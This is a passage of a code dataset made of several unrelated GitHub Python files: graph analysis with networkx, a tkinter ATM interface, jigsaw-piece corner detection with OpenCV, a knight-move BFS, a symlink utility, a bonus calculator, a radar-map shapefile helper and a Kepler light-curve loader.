Estate\"):\n nodecolor.append('deeppink')\n elif (k == \"Finance\"):\n nodecolor.append('navy')\n elif (k == \"Reference\"):\n nodecolor.append('royalblue')\n elif (k == \"Autos & Vehicles\"):\n nodecolor.append('turquoise')\n elif (k == \"Internet & Telecom\"):\n nodecolor.append('lime')\n elif (k == \"Law & Government\"):\n nodecolor.append('palegreen')\n elif (k == \"Jobs & Education\"):\n nodecolor.append('springgreen')\n elif (k == \"Pets & Animals\"):\n nodecolor.append('lightpink')\n elif (k == \"Books & Literature\"):\n nodecolor.append('lightpink')\n \n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\nnx.draw(B, pos=nx.circular_layout(B), node_size=1500, with_labels=True, node_color=nodecolor)\nnx.draw_networkx_edge_labels(B, pos=nx.circular_layout(B), edge_labels=nx.get_edge_attributes(B, 'weight'))\nplt.title('Weighted graph representing the relationship between the categories', size=20)\nplt.show()\n\n# In[ ]:\n\n\n# analyse\nprint('')\nprint(\"number of node : %s\" % B.number_of_nodes())\nprint(\"number of arcs : %s\" % B.number_of_edges())\n\n# arc entrant\nindeg = 0\nfor n in B.in_degree():\n indeg += n[1]\n\n# arc sortant\noutdeg = 0\nfor n in B.in_degree():\n outdeg += n[1]\n\nprint('')\nprint(\"the number of edges pointing to the node : %s\" % indeg)\nprint(\"the number of edges pointing to the outside of the node : %s\" % outdeg)\n\n# passage en graphe non orienté\nG = B.to_undirected()\n\n# min et max de degree\nlistmindegre = (0, 10)\nlistmaxdegre = (0, 0)\nfor n in G.degree():\n if (listmindegre[1] > n[1]):\n listmindegre = n\n if (listmaxdegre[1] < n[1]):\n listmaxdegre = n\n\nprint('')\nprint(\"The node that has the minimal degree is : \", listmindegre)\nprint(\"The node that has the maximum degree is : \", listmaxdegre)\nedgdesmax=0\nfor ed,w in G.edges.items():\n if(w['weight']>edgdesmax):\n edgdesmax=w['weight']\n edgdescat=ed\nedgdescat\nprint(\"both category \",edgdescat[0],\" and \",edgdescat[1],\" has the big relationship weight( w = \",edgdesmax,\")\")\n \n# centrality\nlistmincentrality = (0, 10)\nlistmaxcentrality = (0, 0)\nfor n in (nx.betweenness_centrality(G)).items():\n if (listmincentrality[1] > n[1]):\n listmincentrality = n\n elif (listmaxcentrality[1] < n[1]):\n listmaxcentrality = n\n\nprint('')\nprint(\"The node that has minimal centrality is : \", listmincentrality)\nprint(\"The node that has the maximum centrality is : \", listmaxcentrality)\n\n# normalized\nlistminnormalized = (0, 10)\nlistmaxnormalized = (0, 0)\nfor n in (nx.degree_centrality(G)).items():\n if (listminnormalized[1] > n[1]):\n listminnormalized = n\n elif (listmaxnormalized[1] < n[1]):\n listmaxnormalized = n\n\nprint('')\nprint(\"The node that has the minimum (normalized) degree is : \", listminnormalized)\nprint(\"The node that has the maximal (normalized) degree is: \", listmaxnormalized)\n\n\n# In[ ]:\n\n\n\n# recherche des cliques\nprint('')\ncl = list(nx.find_cliques(G))\nprint(\"estimate number of cliques %s\" % nx.graph_number_of_cliques(G))\nprint(\"click on who has maximum number %s\" % nx.graph_clique_number(G))\nprint('')\n\nprint(\"possible cases of clique \")\nfor cl in nx.find_cliques(G):\n if len(cl)==2 or len(cl)==3:\n print(cl)\n\n\n# In[ ]:\n\n\n# plus courts chemins\npathlengths = []\n\nfor v in G.nodes():\n spl = nx.single_source_shortest_path_length(G, v)\n for p in spl.values():\n pathlengths.append(p)\nprint('')\nprint(\"average of the shortest paths %s\" % round((sum(pathlengths) / len(pathlengths)), 3))\n\nprint('')\n\nprint(\"density : %s\" % round(nx.density(G), 3))\nprint(\"diameter :\", nx.diameter(G.subgraph(max(nx.connected_components(G), key=len))))\n\n# eccentricity\nlistmineccentricity = (0, 10)\nlistmaxeccentricity = (0, 0)\nfor n in (nx.eccentricity(G.subgraph(max(nx.connected_components(G), key=len)))).items():\n if (listmineccentricity[1] > n[1]):\n listmineccentricity = n\n elif (listmaxeccentricity[1] < n[1]):\n listmaxeccentricity = n\n\nprint('')\nprint(\"The node that has the minimal eccentricity is : \", listmineccentricity)\nprint(\"The node that has the maximum eccentricity is : \", listmaxeccentricity)\nprint('')\n\nprint(\"center : %s\" % nx.center(G.subgraph(max(nx.connected_components(G), key=len))))\nprint(\"periphery : %s\" % nx.periphery(G.subgraph(max(nx.connected_components(G), key=len))))\n\n\n\n# In[ ]:\n\n\nplt.figure(figsize = (15,15))\nnx.draw_random(B, node_size=1500, with_labels=True, node_color=nodecolor)\nnx.draw_networkx_edge_labels(B, pos=nx.circular_layout(B), edge_labels=nx.get_edge_attributes(B, 'weight'))\nplt.title('Weighted graph representing the relationship between the categories', size=20)\nplt.show()\n\n# In[ ]:\n\n\nfrom arcgis.gis import GIS\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample241.py","file_name":"sample241.py","file_ext":"py","file_size_in_byte":10360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10997501417","text":"import tkinter as tk\r\n\r\n\r\nwindow=tk.Tk()\r\nwindow.configure(background=\"orange\")\r\nwindow.geometry(\"600x600+400+80\")\r\nwindow.title(\"secure entrance\")\r\nwindow.resizable(width=\"FALSE\", height=\"FALSE\")\r\n\r\ntitle=tk.Label(window,text=\"NL ATM\", fg=\"white\", bg=\"orange\", font=\"Times 30 bold\")\r\ntitle.pack()\r\n\r\n# entryBox = tk.Entry(window)\r\n# entryBox.place(x = 200, y = 50, width=200,height=50)\r\n#\r\n# button_login = tk.Button(window,text=\"Log In\",width=10,height=2, fg=\"orange\",font=(\"Verdana\",\"8\",\"bold\"))\r\n# button_login.pack(pady=60)\r\n\r\nbutton_1=tk.Button(window,text=\"Check Balance\",width=20,height=5, fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_1.place(x=20,y=100)\r\n\r\nbutton_2=tk.Button(window,text=\"Insert Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_2.place(x=20,y=250)\r\n\r\nbutton_3=tk.Button(window,text=\"Withdraw Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_3.place(x=20,y=400)\r\n\r\nbutton_4=tk.Button(window,text=\"Transfer Money\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_4.place(x=390,y=100)\r\n\r\nbutton_5=tk.Button(window,text=\"Edit User Information\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_5.place(x=390,y=250)\r\n\r\nbutton_6=tk.Button(window,text=\"Log out\",width=20,height=5,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_6.place(x=390,y=400)\r\n\r\nbutton_7=tk.Button(window,text=\"kerim&erkan@partnership.com\",width=30,height=2,fg=\"orange\",font=(\"Verdana\",\"10\",\"bold\"))\r\nbutton_7.place(x=150,y=550)\r\n\r\nwindow.mainloop()","repo_name":"ErkanA-10NL/Tkinter_Codes","sub_path":"4_Main_Page.py","file_name":"4_Main_Page.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14306260597","text":"import numpy as np\nfrom scipy.signal import find_peaks\nimport matplotlib.pyplot as plt\nimport math\nimport imutils\nimport cv2\n\nfrom edge import Edge\n\n'''\nThe piece class contains all information about puzzle pieces.\nThe image is the image containing the piece in it,\nthe contour is the location of all the points around the edge of the piece\nthe label is a value used to describe the piece\nthe corners, edge objects, and type of the piece are all found.\n\nThe subimage containing the piece, cropped and rotated appropriately can be found with the function\ngetSubimage\n'''\nclass Piece:\n def __init__(self, label, number, image, contour, settings):\n self.label = label # distinct label for piece\n self.number = number # index of piece in the collection's piece list\n self.image = image # image containing the piece\n self.contour = contour # contour along the edge of the piece\n self.findCorners() # find the corner locations for the piece\n self.settings = settings\n self.findEdges() # find the edges of the piece, as Edge objects\n self.getEdgeColors() # find colors for each edge, store in the Edge objects\n self.findType() # side, middle, or corner\n\n '''\n finds a cropped and rotated image for the piece, using the image the piece is in\n can be resized\n also returns the locations of the corners in this subimage\n used to put together the full image using the functions in PuzzleSolution\n '''\n def getSubimage2(self, edge_up, with_details=False, resize_factor=1, draw_edges=[], rel_edge=0, line_width=0):\n image = self.image.copy()\n h, w, _ = image.shape\n\n # used in demo to show edges on the piece\n for edge in range(4):\n if edge in draw_edges and len(draw_edges) == 4:\n cv2.drawContours(image, self.edges[edge].contour, -1, (0,255,0), thickness=10)\n\n cv2.drawContours(image, self.contour, -1, (0,0,0), thickness=line_width)\n\n # find a circle that encloses the piece in the image\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n x = int(x)\n y = int(y)\n r = int(r)\n\n # adjust the circle if it would go over bounds of image\n if y - r < 0:\n y = r\n if x - r < 0:\n x = r\n\n h, w, _ = self.image.shape\n \n lpad = rpad = tpad = bpad = 0\n if y - r < 0:\n tpad = -(y - r)\n if x - r < 0:\n lpad = -(x - r)\n\n # isolate the piece in the image\n mask = np.zeros_like(image)\n cv2.drawContours(mask, [self.contour], -1, (255,255,255), thickness=-1)\n image_piece_isolated = cv2.bitwise_and(mask, image)\n\n # show details if specified\n if with_details:\n for i, corner in enumerate(self.corners):\n prev = self.corners[i-1]\n cv2.circle(image_piece_isolated, (int(corner[1]), int(corner[2])), 10, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)\n cv2.line(image_piece_isolated, (int(corner[1]), int(corner[2])), (int(prev[1]), int(prev[2])), \n (0,255,0), thickness=1)\n\n for i, edge in enumerate(self.edges):\n if edge.label == 'flat':\n color = (255,0,255)\n elif edge.label == 'inner':\n color = (255,0,0)\n else:\n color = (0,0,255)\n\n cv2.drawContours(image_piece_isolated, edge.contour, -1, color, thickness=5)\n\n # crop to the circle\n image_crop = image_piece_isolated[max(y-r, 0):min(y+r, h),max(x-r, 0):min(x+r, w)]\n h1, w1, _ = image_crop.shape\n\n padded_image = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n padded_image[tpad:tpad+h1, lpad:lpad+w1] = image_crop\n\n ph, pw, _ = padded_image.shape\n\n # get the corners on either end of the piece to be displayed on top\n c1 = self.corners[(edge_up + rel_edge) % 4 - 1][1:]\n c2 = self.corners[(edge_up + rel_edge) % 4][1:]\n\n # get the slope of the line to be on top\n delta = c1 - c2\n dx, dy = delta[0], delta[1]\n\n # if the line is vertical, rotate 90 degrees\n if dx == 0:\n angle = 90\n else: # otherwise, rotate arctan (change in y / change in x) degrees\n angle = math.degrees(math.atan(dy / dx))\n\n # if the intended edge will actually be on the bottom\n if( c2[0] < c1[0] or (c2[0] == c1[0] and c2[1] < c1[1])): # need to rotate more!\n angle = angle + 180 # flip 180 degrees\n\n angle -= 90 * rel_edge\n\n final_image = imutils.rotate(padded_image, angle) # rotate the image\n # resize the image\n final_image = cv2.resize(final_image, (int(ph * resize_factor), int(pw * resize_factor)), interpolation=cv2.INTER_AREA)\n \n return final_image, self.getAdjustedCorners(edge_up, (x, y), r, angle, resize_factor)\n\n '''\n finds the location of the corners in the subimage, where the piece is bounded by a circle and \n the image is rotated (angle) degrees. \n '''\n def getAdjustedCorners(self, edge_up, center, radius, angle, resize_factor):\n new_corners = []\n for i in range(edge_up - 1, edge_up + 3):\n index = i % 4\n corner = self.corners[index]\n # for i, corner in enumerate(self.corners):\n x_old = corner[1]\n y_old = corner[2]\n # adjust so pivot is at origin\n x_adj = x_old - center[0]\n y_adj = y_old - center[1]\n # now rotate about origin\n x_new = x_adj*math.cos(math.radians(-angle)) - y_adj*math.sin(math.radians(-angle))\n y_new = y_adj*math.cos(math.radians(-angle)) + x_adj*math.sin(math.radians(-angle))\n # now add the radius so the corner is at the correct position in the subimage\n x_new += radius\n y_new += radius\n new_corners.append((np.array([x_new, y_new]) * resize_factor).astype(int))\n return np.array(new_corners)\n\n '''\n Finds the corner locations on the piece\n '''\n def findCorners(self):\n # dist, prominence to use in finding the peaks\n dist = len(self.contour) // 64\n sharpdist = len(self.contour) // 64 # how far to look on each side to detect sharpness\n prominence = 0\n\n # center the contour\n center = np.mean(self.contour[:,0], axis=0)\n centered_contour = self.contour - center\n \n # convert to polar coordinates and smooth\n rho, phi = cart2pol(centered_contour[:,0,0], centered_contour[:,0,1])\n rho = running_average(rho, 15)\n rho2 = np.concatenate((rho, rho, rho))\n # find peaks in the distance from the center of the piece\n peaks, _ = find_peaks(rho2, distance=dist, prominence=prominence)\n peaks = peaks[peaks >= len(rho)]\n peaks = peaks[peaks < 2*len(rho)]\n peaks -= len(rho)\n \n # find the sharpness of each peak, defined by the change in derivative\n # between neighboring points\n p1s = self.contour[(peaks - sharpdist) % len(self.contour)]\n p2s = self.contour[peaks]\n p3s = self.contour[(peaks + sharpdist) % len(self.contour)]\n\n d1 = p2s - p1s\n d2 = p3s - p2s\n \n delta = d1[:,0] - d2[:,0]\n sharpness = np.linalg.norm(delta, axis=1)\n\n # remove peaks with negative sharpness\n peaks = peaks[np.where(sharpness > 0)]\n sharpness = sharpness[np.where(sharpness > 0)]\n \n # reduce the peaks to be just the corners\n peaks = self.pickBestPeaks( peaks, sharpness )\n\n # sort in increasing order based on phi (clockwise)\n order = np.argsort([phi[peaks]])\n peaks = peaks[order][0]\n\n corners = np.zeros((4,3), dtype=np.int)\n\n # find the coordinates of the corners\n corners_x = self.contour[:,0,0][peaks]\n corners_y = self.contour[:,0,1][peaks]\n \n # store in an array, return\n corners[:len(peaks),0] = peaks\n corners[:len(peaks),1] = corners_x\n corners[:len(peaks),2] = corners_y\n\n self.corners = corners\n\n '''\n takes a list of peaks and returns the peaks estimated to be corners\n uses heuristics of sharpness, area covered, and rectangulareness to determine corners\n i.e. corners have high sharpness, high rectangularness, and high area covered\n relative to other subsets of the peaks\n '''\n def pickBestPeaks( self, peaks, sharpness ):\n # crop the image for efficiency\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n r = int(r)\n x = int(x)\n y = int(y)\n img3 = np.zeros((2*r, 2*r), dtype=np.uint8)\n adj_contour = self.contour - [x-r, y-r]\n cv2.drawContours(img3, [adj_contour], -1, 255, thickness=-1)\n maxScore = -1\n maxPeaks = [0, 1, 2, 3]\n\n # normalize sharpness\n sharpness = ((sharpness - np.min(sharpness)) / (np.max(sharpness) - np.min(sharpness)))\n\n # iterate over subsets\n for i in range(len(peaks)):\n peak1 = peaks[i]\n for j in range(i+1, len(peaks)):\n peak2 = peaks[j]\n for k in range(j+1, len(peaks)):\n peak3 = peaks[k]\n for l in range(k+1, len(peaks)):\n peak4 = peaks[l]\n img2 = np.zeros_like(img3)\n point1 = [adj_contour[peak1][0][0], adj_contour[peak1][0][1]]\n point2 = [adj_contour[peak2][0][0], adj_contour[peak2][0][1]]\n point3 = [adj_contour[peak3][0][0], adj_contour[peak3][0][1]]\n point4 = [adj_contour[peak4][0][0], adj_contour[peak4][0][1]]\n\n points = np.array([point1, point2, point3, point4])\n \n # find the area covered by the set of peaks\n cv2.fillPoly(img2, pts=[points], color =255)\n img4 = cv2.bitwise_and(img2, img3)\n\n covered_area = np.sum(img4 == 255)\n\n # find the rectangle that bounds the peaks\n x,y,w,h = cv2.boundingRect(points)\n rect = ((x, y), (w, h), 0)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n # find the area covered by the box, and the area of the points\n area_rect = cv2.contourArea(box)\n area_points = cv2.contourArea(np.array([adj_contour[peak1], adj_contour[peak2], adj_contour[peak3], adj_contour[peak4]]))\n\n # maximum when points form perfect rectangle\n if area_rect > 0:\n score_rect = (area_points / area_rect) ** (1/2)\n else:\n score_rect = 0\n\n # maximum when all points are maximum sharpness\n score_sharp = ((sharpness[i] + sharpness[j] + sharpness[k] + sharpness[l]) - max(sharpness[i], sharpness[j], sharpness[k], sharpness[l]))**(1/4)\n \n # combine metrics\n score = (covered_area)*score_rect*score_sharp\n\n if score > maxScore:\n maxPeaks = [peak1, peak2, peak3, peak4]\n maxScore = score\n\n return np.array(maxPeaks)\n\n '''\n Creates Edge objects based on the corners\n '''\n def findEdges(self):\n # init edges to empty\n edges = []\n\n # for each set of corners next to eachother\n for i in range(len(self.corners)):\n # get the corner positions in the contour\n c1_pos = self.corners[i-1][0]\n c2_pos = self.corners[i][0]\n # add a new edge which contains the contour between these two positions\n if c2_pos < c1_pos:\n new_edge = Edge(i, np.concatenate((self.contour[c1_pos:], self.contour[:c2_pos])), self.settings)\n else:\n new_edge = Edge(i, self.contour[c1_pos:c2_pos], self.settings)\n if len(edges) > 0:\n prev_edge = edges[-1]\n prev_edge.setRightNeighbor(new_edge)\n new_edge.setLeftNeighbor(prev_edge)\n edges.append(new_edge)\n\n edges[0].setLeftNeighbor(edges[-1])\n edges[-1].setRightNeighbor(edges[0])\n\n self.edges = edges\n\n '''\n Gets the average colors and color histograms along the contour\n where the edge is\n '''\n def getEdgeColors(self):\n # crop for efficiency\n (x,y), r = cv2.minEnclosingCircle(self.contour)\n r = int(r)\n x = int(x)\n y = int(y)\n\n h, w, _ = self.image.shape\n \n lpad = rpad = tpad = bpad = 0\n if y - r < 0:\n tpad = -(y - r)\n if x - r < 0:\n lpad = -(x - r)\n\n # isolate the piece in the image\n mask = np.zeros_like(self.image)\n cv2.drawContours(mask, [self.contour], -1, (255,255,255), thickness=-1)\n image_piece_isolated = cv2.bitwise_and(mask, self.image)\n\n # crop to the circle\n image_crop = image_piece_isolated[max(y-r, 0):min(y+r, h),max(x-r, 0):min(x+r, w)]\n h1, w1, _ = image_crop.shape\n\n padded_image = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n padded_image[tpad:tpad+h1, lpad:lpad+w1] = cv2.cvtColor(image_crop, cv2.COLOR_BGR2LAB)\n padded_image[:,:,0] = padded_image[:,:,0] // 2\n\n # erode the mask in order to increase accuracy\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7,7))\n\n adj_contour = self.contour - [x-r+lpad, y-r+tpad]\n piece_mask = np.zeros((2*r, 2*r), dtype=np.uint8)\n\n cv2.drawContours(piece_mask, [adj_contour], -1, 255, thickness=-1)\n piece_mask = cv2.erode(piece_mask, kernel, iterations=1)\n\n # for showing the colors as in the presentation\n piece_mask_show = np.zeros_like(padded_image)\n color_images = []\n\n # iterate over edges\n for i, edge in enumerate(self.edges):\n # adjust the contour to fit within the cropped image\n adj_contour = edge.contour - [x-r+lpad, y-r+tpad]\n edge_mask = np.zeros((2*r, 2*r), dtype=np.uint8)\n img_show = np.zeros((2*r, 2*r, 3), dtype=np.uint8)\n edge_colors = None\n edge_color_hists = []\n\n # find indices to look for a contour in\n hist_mask = np.zeros_like(edge_mask)\n hist_indices = np.linspace(2, edge.points_per_side - 3, max(4, edge.points_per_side // 8)).astype(int)[1:]\n \n starting_points = []\n corresponding_points = []\n # find points to look for color in\n for j in range(0, edge.points_per_side-1):\n if j == edge.points_per_side - 1:\n p1 = adj_contour[j][0]\n p2 = adj_contour[j-1][0]\n dx, dy = p1 - p2\n else:\n p1 = adj_contour[j][0]\n p2 = adj_contour[j+1][0]\n dx, dy = p2 - p1\n\n if dx == 0 and dy == 0:\n if j > 0:\n starting_points.append(starting_points[-1])\n corresponding_points.append(corresponding_points[-1])\n continue\n else:\n dx, dy = adj_contour[j+2][0] - p1\n\n perp_vector = ((1/np.linalg.norm([-dy, dx]))*np.array([-dy, dx]))\n \n starting_points.append((p1 + self.settings[0]*perp_vector).astype(int))\n corresponding_points.append((p1 + (self.settings[1] - self.settings[0])*perp_vector).astype(int))\n\n # iterate over points to look for colors in\n for j in range(2, edge.points_per_side-2):\n p1 = starting_points[j-1]\n p2 = starting_points[j+1]\n p3 = corresponding_points[j-1]\n p4 = corresponding_points[j+1]\n\n # get the color average\n edge_mask_2 = np.zeros((2*r, 2*r), dtype=np.uint8)\n cv2.drawContours(edge_mask_2, [np.array([p1, p3, p4, p2])], -1, 255, thickness=-1)\n\n edge_mask_2 = cv2.bitwise_and(edge_mask_2, piece_mask)\n hist_mask = cv2.bitwise_or(hist_mask, edge_mask_2)\n\n color_avg = cv2.mean(padded_image, mask=edge_mask_2)\n color = np.array([color_avg[0], color_avg[1], color_avg[2]])\n\n # # uncomment to make the gif\n # piece_mask_show[edge_mask_2 > 0] = padded_image[edge_mask_2 > 0]\n # cv2.imshow('em2', piece_mask_show)\n # if j % 4 == 0:\n # color_images.append(piece_mask_show.copy())\n # cv2.waitKey(20)\n\n if edge_colors is None:\n edge_colors = color\n else:\n edge_colors = np.vstack((edge_colors, color))\n\n # calculate histogram\n if np.any(hist_indices == j):\n hist = cv2.calcHist([padded_image], [0, 1, 2], hist_mask, [16, 16, 16], [0, 256, 0, 256, 0, 256])\n cv2.normalize(hist, hist, alpha=0, beta=1, norm_type=cv2.NORM_MINMAX)\n edge_color_hists.append(hist)\n\n hist_mask = np.zeros_like(hist_mask)\n\n\n edge.color_arr = edge_colors\n edge.color_hists = edge_color_hists\n\n # # uncomment to save the gif\n # for j in range(64):\n # color_images.append(color_images[-1])\n # cv2.imshow('color_img', color_images[-1])\n # import imageio\n # imageio.mimsave(f'C:/Users/jimmy/Documents/SeniorDesign/PuzzleSolver/piece_gif.gif', color_images)\n # cv2.waitKey(0)\n\n '''\n Saves the type of the piece\n '''\n def findType(self):\n # get the number of flat edges on the piece\n num_flat = 0\n for edge in self.edges:\n if edge.label == 'flat':\n num_flat += 1\n\n # label appropriately\n if num_flat == 0:\n piece_type = 'middle'\n elif num_flat == 1:\n piece_type = 'side'\n else:\n piece_type = 'corner'\n\n self.type = piece_type\n\n# convert from cartesian to polar coordinates, used in findCorners\ndef cart2pol(x, y):\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return rho, phi\n\n\ndef running_average(x, n):\n from scipy.ndimage.filters import uniform_filter1d\n return uniform_filter1d(x, size=n, mode='wrap')","repo_name":"ColinWoods18/CV-PuzzleSolver","sub_path":"src/piece.py","file_name":"piece.py","file_ext":"py","file_size_in_byte":18774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74405746727","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\ndx = [-1, -2, -2, -1, 1, 2, 2, 1]\ndy = [2, 1, -1, -2, -2, -1, 1, 2]\n\ndef bfs(a, b, target_x, target_y):\n q = deque([[a, b]])\n\n while q:\n x, y = q.popleft()\n \n if x == target_x and y == target_y:\n return cnt[x][y]\n \n for i in range(8):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < I and 0 <= ny < I and cnt[nx][ny] == 0:\n q.append([nx, ny])\n cnt[nx][ny] = cnt[x][y] + 1\n \nT = int(input())\nfor _ in range(T):\n I = int(input())\n a, b = map(int, input().split())\n target_x, target_y = map(int, input().split())\n cnt = [[0] * I for _ in range(I)]\n print(bfs(a, b, target_x, target_y))","repo_name":"dongdaang/python_algorithm_private_study","sub_path":"백준/DFS와 BFS/나이트의 이동_7562.py","file_name":"나이트의 이동_7562.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70935428649","text":"# -*- coding: utf-8 -*-\nfrom colorama import Fore\nimport os\n\nrank = 1\n\n\ndef handle(output_dir, config):\n for symlink in config:\n print(Fore.WHITE + \"symlink: {} -> {}\".format(symlink[0], symlink[1]) +\n Fore.RESET)\n Symlink(\n src=os.path.join(output_dir, symlink[0]),\n dst=os.path.join(output_dir, symlink[1])).run()\n print(Fore.WHITE + \"done\\n\" + Fore.RESET)\n\n\nclass Symlink:\n def __init__(self, src, dst):\n self.src = os.path.abspath(src)\n self.dst = os.path.abspath(dst)\n\n def run(self):\n if os.path.exists(self.dst):\n return\n\n dir = os.path.dirname(self.dst)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n os.symlink(self.src, self.dst)\n","repo_name":"f-koehler/dotgen","sub_path":"dotgen/plugins/symlinks.py","file_name":"symlinks.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605877447","text":"\"\"\"\nФункция принимает на вход три списка одинаковой длины:\n✔ имена str,\n✔ ставка int,\n✔ премия str с указанием процентов вида «10.25%».\n✔ Вернуть словарь с именем в качестве ключа и суммой\nпремии в качестве значения.\n✔ Сумма рассчитывается как ставка умноженная на процент премии.\n\n\"\"\"\nfrom random import sample, choice\nfrom string import ascii_lowercase\nfrom pprint import pp\n\n\ndef main(table: list[list[str | int]]) -> dict[str, float]:\n out = dict()\n for line in table:\n out[line[0]] = line[1] * round(float(line[2][:-1]) * 0.01, 4)\n return out\n\n\nif __name__ == '__main__':\n sample_ = zip(\n sample(ascii_lowercase, 5),\n sample(range(10000, 12000, 100), 5),\n [f\"{choice(range(100))}.{choice(range(100))}%\" for _ in range(5)])\n sample_ = list(sample_)\n print(sample_)\n print()\n print(main(sample_))\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem4/t5.py","file_name":"t5.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27817439233","text":"# -*- coding: utf-8 -*-\n# Author: Du puyuan\n\nimport os\nfrom typing import Union, List\n\nimport numpy as np\nimport shapefile\nfrom matplotlib.lines import Line2D\n\nfrom cinrad.constants import MODULE_DIR\nfrom cinrad.error import RadarPlotError\nfrom cinrad._typing import Array_T\n\ndef highlight_area(area:Union[Array_T, str], linecolor:str='red', **kwargs) -> List[Line2D]:\n r'''Return list of Line2D object for given area name'''\n fpath = os.path.join(MODULE_DIR, 'shapefile', 'City')\n shp = shapefile.Reader(fpath)\n rec = shp.shapeRecords()\n lines = list()\n if isinstance(area, str):\n area = [area]\n for i in area:\n if not isinstance(i, str):\n raise RadarPlotError('Area name should be str')\n name = np.array([i.record[2].decode('GBK') for i in rec])\n target = np.array(rec)[(name == i).nonzero()[0]]\n for j in target:\n pts = j.shape.points\n x = [i[0] for i in pts]\n y = [i[1] for i in pts]\n lines.append(Line2D(x, y, color=linecolor))\n return lines","repo_name":"zjuas2016/PyCINRAD","sub_path":"cinrad/visualize/shapepatch.py","file_name":"shapepatch.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"13791730808","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nQuery the KEBC and load Kepler light curves.\n\"\"\"\n\nfrom __future__ import print_function, division, absolute_import\n\nimport kplr\nimport numpy as np\nimport paramiko\nimport pymysql\nimport socket\n\nfrom . import exceptions\nfrom . import utils\nfrom .config import db_params\n\n\ndef select_kics(catalog_file='kebc.csv', period_min=0., period_max=None):\n \"\"\"\n Return KIC IDs based on system parameters.\n\n Parameters\n ----------\n catalog_file : string, optional\n Name of catalog file contained in decatur/data\n period_min : float, optional\n Minimum orbital period in days.\n period_max : float, optional\n Maximum orbital period in days.\n\n Returns\n -------\n kics : numpy.ndarray\n KIC IDs matching search criteria.\n\n Raises\n ------.\n CatalogMatchError\n If the query returns no KIC IDs.\n \"\"\"\n # Load the catalog DataFrame.\n df = utils.load_catalog(catalog_file)\n\n # Construct the query string with minimum period cutoff.\n query_string = 'period > {}'.format(period_min)\n\n if period_max is not None:\n # Add the maximum period cutoff\n query_string = '{} & period < {}'.format(query_string, period_max)\n\n # Query the catalog and return KIC IDs.\n kics = df.query(query_string)['KIC'].values.astype(int)\n\n if len(kics) == 0:\n raise exceptions.CatalogMatchError('No EB catalog entries matching criteria.')\n\n return kics.astype(int)\n\n\ndef __dbconnect(db_name):\n \"\"\"\n Log into a database using MySQLdb. Written by Ethan Kruse.\n\n Parameters\n ----------\n db_name : string\n Database name\n\n Returns\n -------\n dbconnect : Connect\n MySQLdb connector.\n\n Raises\n ------\n DatabaseSetupError\n If the environment variables for the database are not defined\n \"\"\"\n if None in db_params.values():\n raise exceptions.DatabaseSetupError('Environment variables for the '\n 'database are not defined.')\n\n return pymysql.connect(host=db_params['host'], user=db_params['user'],\n passwd=db_params['password'], db=db_name,\n connect_timeout=1)\n\n\ndef loadlc(kic, use_pdc=True, long_cadence=True, from_db=True,\n db_name='Kepler', fetch=True):\n \"\"\"\n Load Kepler data from a local database. Written by Ethan Kruse.\n\n Parameters\n ----------\n kic : int\n Kepler Input Catalog number for the target.\n use_pdc : bool, optional\n Defaults to True. If True, use the PDCSAP data instead of the raw SAP.\n long_cadence : bool, optional\n Whether to select long or short cadence. Defaults to True, or LC data.\n from_db : bool, optional\n Default loads data from the MySQL database.\n Set to False to load data from MAST using the kplr package.\n db_name : str, optional\n Database name.\n fetch : bool, optional\n If `from_db` == False, set to `fetch == False` to not download data.\n\n Returns\n -------\n times : ndarray\n Kepler times of center of exposure.\n fluxes : ndarray\n Kepler fluxes for each quarter.\n flux_errs : ndarray\n Kepler flux errors for each exposure.\n cadences : ndarray\n Cadence number.\n quarters : ndarray\n Kepler quarter.\n flags : ndarray\n Kepler data quality flags.\n\n Raises\n ------\n NoLightCurvesError\n If there are no light curves for the given KIC ID.\n\n \"\"\"\n if from_db:\n table_name = 'source'\n\n if long_cadence:\n lc_flag = 'LCFLAG > 0'\n else:\n lc_flag = 'LCFLAG = 0'\n\n if use_pdc:\n flux_str = 'pdcsap_flux, pdcsap_flux_err '\n else:\n flux_str = 'sap_flux, sap_flux_err '\n\n host_name = socket.gethostname()\n # Check if local host is on same domain as database host\n if db_params['domain'] in host_name:\n count = 0\n got_it = False\n # Try multiple times in case of sporadic database timeouts\n while count < 5 and not got_it:\n try:\n db = __dbconnect(db_name)\n cursor = db.cursor()\n\n to_ex = 